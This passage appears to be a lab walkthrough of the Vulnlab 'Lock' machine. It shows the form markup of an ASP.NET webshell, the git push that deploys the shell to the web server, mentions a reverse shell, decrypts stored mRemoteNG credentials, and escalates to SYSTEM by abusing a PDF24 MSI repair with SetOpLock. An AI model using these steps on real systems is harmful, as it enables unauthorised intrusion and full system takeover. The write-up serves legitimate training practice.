<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>

<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!--    http://michaeldaw.org   04/2007    -->
                                                                                                       
┌──(puck㉿kali)-[~/vulnlab/lock/website]
└─$ 

With reverse shell inside the git repository, we can push it to Gitea and it will get deployed to the web server.

git config --global user.name ellen.freeman
git config --global user.email ellen.freeman@lock.vl
git status
git add aspshell.aspx
git status
git commit -m "Update"
[main 13d3506] Update
 1 file changed, 45 insertions(+)
 create mode 100644 shell.aspx
➜  website git:(main) git push
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 2 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 1.41 KiB | 1.41 MiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://vl.lock:3000/ellen.freeman/website.git
   73cdcc1..13d3506  main -> main

 

after uploading we visit http://lock.vl/cmdasp.aspx, and run a b64 reverseshell to my kali box.

.

This is a mRemoteNG config file belonging to the gale.dekarios user. However, the password is encrypted. A quick google search for “mremoteng password decrypt” leads us to this tool https://github.com/gquere/mRemoteNG_password_decrypt that decrypts mRemoteNG configuration files. Running it gives us the decrypted password:

➜  lock python3 mremoteng_decrypt.py config.xml
Name: RDP/Gale
Hostname: Lock
Username: Gale.Dekarios
Password: <REDACTED>

RDP into the machine

➜  lock xfreerdp /u:gale.dekarios /d:WORKGROUP /p:'<REDACTED>' /v:lock.vl /size:1280x720

 

Exploiting PDF24 to get SYSTEM

 

We’ll need SetOpLock.exe binary available in this GitHub repository.

After downloading SetOpLock.exe binary to the box, we have  to proceed

Step 1

 

start oplock so the file gets locked when the repair process wants to write to it.

.\SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r

Step 2

 

Run the MSI installer to trigger the repair process.

msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi

This can take some time, however at the end we can see that there’s indeed a cmd windows stuck.

Step 3

 

From here we can right click on the stuck window and go to properties. In properties there is a blue highlighted clickable link which will open a web browser after being clicked.

Step 4

 

In the very final step we just have to open a file dialog. We can do that with Ctrl+O. When the dialog opens we can type cmd.exe to the search bar and hit enter. This will start a new cmd.exe process running as SYSTEM.

 

.

Beyond root

c:\Users\Administrator\Desktop>systeminfo

Host Name:                 LOCK
OS Name:                   Microsoft Windows Server 2022 Standard
OS Version:                10.0.20348 N/A Build 20348
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00454-10000-00001-AA973
Original Install Date:     12/27/2023, 10:15:07 AM
System Boot Time:          6/2/2024, 7:32:53 AM
System Manufacturer:       Amazon EC2
System Model:              t3a.small
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2200 Mhz
BIOS Version:              Amazon EC2 1.0, 10/16/2017
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     1,996 MB
Available Physical Memory: 355 MB
Virtual Memory: Max Size:  3,148 MB
Virtual Memory: Available: 1,100 MB
Virtual Memory: In Use:    2,048 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5031993
                           [02]: KB5033118
                           [03]: KB5032310
Network Card(s):           1 NIC(s) Installed.
                           [01]: Amazon Elastic Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.64.1
                                 IP address(es)
                                 [01]: 10.10.113.72
                                 [02]: fe80::b536:c258:f11a:5528
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

c:\Users\Administrator\Desktop>